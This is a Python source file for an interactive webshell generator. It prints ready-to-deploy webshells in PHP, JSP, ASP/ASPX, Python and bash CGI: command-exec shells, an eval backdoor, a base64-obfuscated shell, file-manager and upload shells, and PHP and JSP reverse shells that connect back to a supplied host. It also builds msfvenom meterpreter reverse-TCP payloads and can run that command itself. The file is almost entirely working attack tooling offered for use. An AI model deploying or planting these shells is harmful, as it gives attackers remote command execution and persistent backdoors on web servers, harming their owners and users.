# webshell generator - php, jsp, asp, python webshells
import os, base64
from rich.console import Console
from rich.table import Table
from rich.panel import Panel
from rich.prompt import Prompt
from rich import box

console = Console()

def clr():
    os.system('cls' if os.name == 'nt' else 'clear')

def pause():
    Prompt.ask("\n[dim]enter to continue[/dim]")


def php_webshells():
    clr()
    console.print("[bold red]=== PHP WEBSHELLS ===[/bold red]\n")
    
    console.print("[bold yellow]--- 1. Simple Command Exec ---[/bold yellow]\n")
    shell1 = '<?php echo shell_exec($_GET["cmd"]); ?>'
    console.print(f'  [cyan]{shell1}[/cyan]\n')
    console.print(f'  [dim]usage: {{"target.com/shell.php?cmd=id"}}[/dim]\n')
    
    console.print("[bold yellow]--- 2. System Exec with Output ---[/bold yellow]\n")
    shell2 = '<?php echo "<pre>".shell_exec($_REQUEST["cmd"])."</pre>"; ?>'
    console.print(f'  [cyan]{shell2}[/cyan]\n')
    
    console.print("[bold yellow]--- 3. Pass-through Shell ---[/bold yellow]\n")
    shell3 = '<?php passthru($_REQUEST["cmd"]); ?>'
    console.print(f'  [cyan]{shell3}[/cyan]\n')
    
    console.print("[bold yellow]--- 4. eval() Backdoor ---[/bold yellow]\n")
    shell4 = '<?php eval($_POST["code"]); ?>'
    console.print(f'  [cyan]{shell4}[/cyan]\n')
    console.print(f'  [dim]POST: code=system("id");[/dim]\n')
    
    console.print("[bold yellow]--- 5. File Manager ---[/bold yellow]\n")
    shell5 = """<?php
if(isset($_GET['f'])){
    $f=$_GET['f'];
    if(isset($_GET['d'])){
        file_put_contents($f,base64_decode($_POST['data']));
        echo "written";
    } elseif(isset($_GET['r'])){
        echo base64_encode(file_get_contents($f));
    } else {
        echo "<pre>".htmlentities(file_get_contents($f))."</pre>";
    }
} else {
    echo "<pre>";
    foreach(scandir('.') as $f) echo $f."\\n";
    echo "</pre>";
}?>"""
    console.print(f'  [cyan]{shell5}[/cyan]\n')
    
    console.print("[bold yellow]--- 6. Reverse Shell ---[/bold yellow]\n")
    lhost = Prompt.ask("[cyan]LHOST for reverse shell (empty to skip)[/cyan]", default="")
    if lhost:
        lport = Prompt.ask("[cyan]LPORT[/cyan]", default="4444")
        shell6 = f'<?php $sock=fsockopen("{lhost}",{lport});exec("/bin/sh -i <&3 >&3 2>&3"); ?>'
        console.print(f'  [cyan]{shell6}[/cyan]\n')
    
    console.print("[bold yellow]--- 7. Obfuscated Shell ---[/bold yellow]\n")
    # base64 encoded system() call
    encoded = base64.b64encode(b'system($_GET["cmd"]);').decode()
    shell7 = f'<?php eval(base64_decode("{encoded}")); ?>'
    console.print(f'  [cyan]{shell7}[/cyan]\n')
    
    console.print("[bold yellow]--- 8. File Upload Shell ---[/bold yellow]\n")
    shell8 = """<?php
if(isset($_FILES['f'])){
    move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
    echo "uploaded: ".$_FILES['f']['name'];
} else {
    echo '<form method="POST" enctype="multipart/form-data"><input type="file" name="f"><button>Upload</button></form>';
}?>"""
    console.print(f'  [cyan]{shell8}[/cyan]\n')
    
    save = Prompt.ask("[cyan]save all to file? (path or empty)[/cyan]", default="")
    if save:
        with open(save, 'w') as f:
            f.write(f"// PHP Webshells generated by 0day\n\n")
            f.write(f"// 1. Simple exec: {shell1}\n")
            f.write(f"// 2. Command exec: {shell2}\n")
            f.write(f"// 3. Passthru: {shell3}\n")
            f.write(f"// 4. Eval backdoor: {shell4}\n")
        console.print(f"[green]saved to {save}[/green]")
    
    pause()

def jsp_webshells():
    clr()
    console.print("[bold red]=== JSP WEBSHELLS ===[/bold red]\n")
    
    console.print("[bold yellow]--- 1. Command Exec ---[/bold yellow]\n")
    shell1 = '<%Runtime rt=Runtime.getRuntime();Process p=rt.exec(request.getParameter("cmd"));java.io.InputStream is=p.getInputStream();int a=-1;byte[] b=new byte[2048];while((a=is.read(b))!=-1){out.println(new String(b,0,a));}%>'
    console.print(f'  [cyan]{shell1}[/cyan]\n')
    
    console.print("[bold yellow]--- 2. JSP with Form ---[/bold yellow]\n")
    shell2 = """<%@ page import="java.io.*" %>
<%
if(request.getParameter("cmd")!=null){
    Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));
    BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;while((line=br.readLine())!=null){out.println(line+"<br>");}
}
%>
<form><input name="cmd" type="text"><input type="submit"></form>"""
    console.print(f'  [cyan]{shell2}[/cyan]\n')
    
    console.print("[bold yellow]--- 3. Reverse Shell (JSP) ---[/bold yellow]\n")
    lhost = Prompt.ask("[cyan]LHOST (empty to skip)[/cyan]", default="")
    if lhost:
        lport = Prompt.ask("[cyan]LPORT[/cyan]", default="4444")
        shell3 = f'<%@ page import="java.net.*,java.io.*" %><%Socket s=new Socket("{lhost}",{lport});Process p=Runtime.getRuntime().exec("/bin/sh");InputStream pi=p.getInputStream(),si=s.getInputStream(),po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){{while(pi.available()>0)so.write(pi.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);}}%>'
        console.print(f'  [cyan]{shell3}[/cyan]\n')
    
    pause()

def asp_webshells():
    clr()
    console.print("[bold red]=== ASP WEBSHELLS ===[/bold red]\n")
    
    console.print("[bold yellow]--- 1. ASP Command Exec ---[/bold yellow]\n")
    shell1 = '<%Set o=Server.CreateObject("WSCRIPT.SHELL"):Set r=o.Exec(Request("cmd")):Response.Write(r.StdOut.ReadAll())%>'
    console.print(f'  [cyan]{shell1}[/cyan]\n')
    
    console.print("[bold yellow]--- 2. ASPX Command Exec ---[/bold yellow]\n")
    shell2 = """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
string cmd=Request["cmd"];
if(cmd!=null){
    Process p=new Process();
    p.StartInfo.FileName="cmd.exe";
    p.StartInfo.Arguments="/c "+cmd;
    p.StartInfo.RedirectStandardOutput=true;
    p.StartInfo.UseShellExecute=false;
    p.Start();
    Response.Write("<pre>"+p.StandardOutput.ReadToEnd()+"</pre>");
}
%>"""
    console.print(f'  [cyan]{shell2}[/cyan]\n')
    
    pause()

def python_webshells():
    clr()
    console.print("[bold red]=== PYTHON WEBSHELLS ===[/bold red]\n")
    
    console.print("[bold yellow]--- 1. Flask Webshell ---[/bold yellow]\n")
    shell1 = """from flask import Flask,request,subprocess
app=Flask(__name__)
@app.route('/')
def shell():
    cmd=request.args.get('cmd','id')
    return subprocess.check_output(cmd,shell=True).decode()
app.run(host='0.0.0.0',port=8080)"""
    console.print(f'  [cyan]{shell1}[/cyan]\n')
    
    console.print("[bold yellow]--- 2. Simple HTTP Shell ---[/bold yellow]\n")
    shell2 = """import http.server,subprocess,os
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith('/cmd'):
            cmd=self.path.split('=',1)[1]
            out=subprocess.check_output(cmd,shell=True)
            self.send_response(200)
            self.end_headers()
            self.wfile.write(out)
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b'<form><input name="cmd"><button>run</button></form>')
http.server.HTTPServer(('0.0.0.0',8080),H).serve_forever()"""
    console.print(f'  [cyan]{shell2}[/cyan]\n')
    
    pause()

def cgi_webshells():
    clr()
    console.print("[bold red]=== CGI WEBSHELLS ===[/bold red]\n")
    
    console.print("[bold yellow]--- Bash CGI ---[/bold yellow]\n")
    shell1 = """#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "<pre>"
echo "$QUERY_STRING" | sed 's/cmd=//g' | bash
echo "</pre>" """
    console.print(f'  [cyan]{shell1}[/cyan]\n')
    console.print(f'  [dim]save as shell.cgi, chmod +x, access: shell.cgi?cmd=id[/dim]\n')
    
    pause()

def msfvenom_webshells():
    clr()
    console.print("[bold red]=== MSFVENOM WEBSHELLS ===[/bold red]\n")
    
    lhost = Prompt.ask("[cyan]LHOST[/cyan]")
    lport = Prompt.ask("[cyan]LPORT[/cyan]", default="4444")
    
    shells = {
        "php/meterpreter/reverse_tcp": ".php",
        "java/jsp_shell_reverse_tcp": ".jsp",
        "java/jsp_shell_reverse_tcp (Tomcat)": ".jsp",
        "windows/meterpreter/reverse_tcp (ASP)": ".asp",
        "python/meterpreter/reverse_tcp": ".py",
    }
    
    console.print("\n[yellow]available webshell payloads:[/yellow]\n")
    for i, (payload, ext) in enumerate(shells.items(), 1):
        console.print(f"  [{i}] {payload} ({ext})")
    
    c = Prompt.ask("\n[cyan]pick[/cyan]", default="1")
    payload_map = {str(i): p for i, p in enumerate(shells.keys(), 1)}
    payload = payload_map.get(c, "php/meterpreter/reverse_tcp")
    
    outfile = Prompt.ask("[cyan]output file[/cyan]", default=f"shell.{payload.split('/')[0]}")
    
    cmd = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f raw -o {outfile}"
    console.print(f"\n[green]{cmd}[/green]")
    
    run = Prompt.ask("[cyan]run now? (y/n)[/cyan]", default="n")
    if run.lower() == "y":
        os.system(cmd)
        console.print("[green]done![/green]")
    
    pause()


def run():
    while True:
        clr()
        console.print("[bold red]=== WEBSHELL GENERATOR ===[/bold red]\n")
        from rich.table import Table
        t = Table(show_header=False, box=box.ROUNDED, border_style="red", padding=(0, 2))
        t.add_column("", style="bold yellow", width=4)
        t.add_column("")
        opts = [
            "PHP Webshells",
            "JSP Webshells",
            "ASP/ASPX Webshells",
            "Python Webshells",
            "CGI Webshells",
            "MSFvenom Webshells",
        ]
        for i, o in enumerate(opts, 1):
            t.add_row(str(i), o)
        t.add_row("", "")
        t.add_row("b", "Back")
        console.print(Panel(t, title="[bold]WEBSHELLS[/bold]", border_style="red"))
        
        try:
            c = int(Prompt.ask("[bold yellow]>[/bold yellow]"))
        except ValueError:
            c = 0
        
        if c == 1: php_webshells()
        elif c == 2: jsp_webshells()
        elif c == 3: asp_webshells()
        elif c == 4: python_webshells()
        elif c == 5: cgi_webshells()
        elif c == 6: msfvenom_webshells()
        elif c == 0: return
